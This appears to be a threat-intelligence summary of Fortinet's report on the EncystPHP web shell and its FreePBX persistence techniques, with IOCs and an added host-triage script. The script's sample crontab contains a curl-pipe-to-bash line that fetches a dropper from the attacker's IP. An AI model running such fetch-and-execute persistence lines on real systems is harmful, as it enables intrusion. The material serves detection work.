Unveiling the Weaponized Web Shell EncystPHP

FortiGuard Labs discovered a Base64-encoded PHP web shell named EncystPHP deployed by exploiting FreePBX Endpoint Manager vulnerability CVE-2025-64328, enabling remote command execution, persistence, and telephony abuse. The campaign, attributed to INJ3CTOR3, delivered droppers from 45[.]234[.]176[.]202 (crm[.]razatelefonia[.]pro), created a root-level user and SSH backdoor, and maintained persistence via cron jobs and widespread web shell copies. #EncystPHP #FreePBX

Keypoints

  • FortiGuard Labs identified a PHP web shell named EncystPHP that was deployed via exploitation of FreePBX Endpoint Manager CVE-2025-64328.
  • Initial exploitation originated from infrastructure resolving to crm[.]razatelefonia[.]pro (45[.]234[.]176[.]202), which delivered droppers named c and k.php that decoded Base64 payloads.
  • EncystPHP modifies file permissions, removes competing web shells and logs, deletes FreePBX users/modules, and forges timestamps to hinder detection.
  • The actor established persistent control by creating a root-level account (newfpbx), injecting an SSH public key, resetting passwords, and installing multiple cron jobs and license/test scripts.
  • The web shell masquerades as legitimate FreePBX files (e.g., ajax.php) and exposes an “Ask Master” interface enabling arbitrary command execution and PBX/Asterisk operations.
  • Fortinet detections and protections (AV signatures, IPS, Web Filtering, IP reputation) are available for the IOCs and exploit CVE-2025-64328; impacted systems should be treated as fully compromised.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of FreePBX Endpoint Manager via CVE-2025-64328 to execute post-authentication command injection.
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Execution of Bash commands via injected payloads and downloaded shell scripts.
  • [T1053.003] Scheduled Task/Job: Cron – Multiple crontab entries installed to repeatedly download and execute droppers to maintain persistence.
  • [T1505.003] Server Software Component: Web Shell – Deployment of EncystPHP masquerading as legitimate FreePBX PHP files (ajax.php, config.php) to provide remote access.
  • [T1068] Exploitation for Privilege Escalation – Abuse of the FreePBX administrative context to execute commands with elevated privileges.
  • [T1136.001] Create Account: Local Account – Creation of a root-level user account (newfpbx) with UID 0 to maintain access.
  • [T1003] OS Credential Dumping – Collection of database credentials from /etc/freepbx.conf.
  • [T1070.004] Indicator Removal on Host: File Deletion – Deletion of logs, cron artifacts, and the FreePBX Endpoint Manager module to erase traces.
  • [T1222.002] File and Directory Permissions Modification: Linux – Modification of file permissions to 000 on ajax.php and model.php to block access and disrupt inspection.
  • [T1036.005] Masquerading: Match Legitimate Name or Location – Web shell written to legitimate FreePBX file paths with forged timestamps to blend in.
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Removal of competing web shells and disabling of error reporting to hinder detection.
  • [T1021.004] Remote Services: SSH – Injection of an attacker-controlled SSH public key and forced exposure of port 22 for remote access.
  • [T1105] Ingress Tool Transfer – Repeated download of droppers (c, k.php) from attacker-controlled infrastructure.
  • [T1071.001] Application Layer Protocol: Web Protocols – Use of HTTP for payload delivery and command execution with C2 infrastructure.
  • [T1496] Resource Hijacking – Abuse of PBX resources for unauthorized telephony operations and outbound call activity.

Indicators of Compromise

  • [URLs] download/dropper locations – hxxp://45[.]234[.]176[.]202/new/k.php, hxxp://45[.]234[.]176[.]202/new/ch
  • [Hosts / IPs] attacker infrastructure and observed sources – 45[.]234[.]176[.]202, 187[.]108[.]1[.]130
  • [Domains] C2 / dropper domain – crm[.]razatelefonia[.]pro (resolves to 45[.]234[.]176[.]202)
  • [Files / filenames] dropped web shells and scripts – c (dropper), k.php (dropper), ajax.php (deployed web shell), test.sh, license.php
  • [File hashes] malware binaries/samples – 71d94479d58c32d56…b26b8c7 (long concatenated hash provided in report) and other sample hashes
  • [Accounts] created or modified system accounts – newfpbx (root-level account created), modified users such as ampuser and svc_freepbx
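A small host-triage script, added here as an example and not part of the Fortinet report, that checks constructed /etc/passwd, crontab and file-mode samples for the persistence artifacts listed above: an extra UID 0 account, cron jobs fetching from the reported infrastructure, and mode 000 on the web shell files. The FreePBX web-root paths under /var/www/html are assumed.

```python
# Constructed sample artifacts (not taken from the report): a passwd file with the
# extra UID 0 account, a crontab pulling the dropper, and a FreePBX file listing.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin
newfpbx:x:0:0::/home/newfpbx:/bin/bash
"""
SAMPLE_CRONTAB = """*/5 * * * * curl -s http://45.234.176.202/new/k.php | bash
0 3 * * * /usr/sbin/fwconsole chown
"""
# path -> octal mode, as `stat -c '%a %n'` prints it; paths are assumed, not from the report
SAMPLE_MODES = {
    "/var/www/html/admin/modules/endpoint/ajax.php": "000",
    "/var/www/html/admin/modules/endpoint/model.php": "000",
    "/var/www/html/admin/config.php": "644",
}

# Infrastructure and dropper paths reported in the IOC list above (refanged for matching)
DROPPER_HOSTS = ("45.234.176.202", "187.108.1.130", "crm.razatelefonia.pro")
DROPPER_PATHS = ("/new/k.php", "/new/ch")


def uid0_accounts(passwd):
    """Accounts with UID 0 other than root (T1136.001)."""
    hits = []
    for line in passwd.splitlines():
        parts = line.split(":")
        if len(parts) >= 3 and parts[2] == "0" and parts[0] != "root":
            hits.append(parts[0])
    return hits


def suspicious_cron(crontab):
    """Crontab lines that fetch from the reported infrastructure (T1053.003, T1105)."""
    return [l for l in crontab.splitlines()
            if any(h in l for h in DROPPER_HOSTS) or any(p in l for p in DROPPER_PATHS)]


def zero_mode_files(modes):
    """Files set to mode 000 under the (assumed) FreePBX web root (T1222.002)."""
    return sorted(p for p, m in modes.items() if m == "000" and p.startswith("/var/www/html"))


def triage(passwd, crontab, modes):
    """Run all three checks and return the findings keyed by check name."""
    return {"uid0_accounts": uid0_accounts(passwd),
            "cron_droppers": suspicious_cron(crontab),
            "mode_000_files": zero_mode_files(modes)}


if __name__ == "__main__":
    for name, findings in triage(SAMPLE_PASSWD, SAMPLE_CRONTAB, SAMPLE_MODES).items():
        print(name, findings)
```

On a live host, feed the script the real /etc/passwd, the output of `crontab -l` for root and asterisk, and a `stat` listing of the web root; any non-empty finding means the system should be treated as compromised, as the report advises.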


Read more: https://feeds.fortinet.com/~/943094408/0/fortinet/blog/threat-research~Unveiling-the-Weaponized-Web-Shell-EncystPHP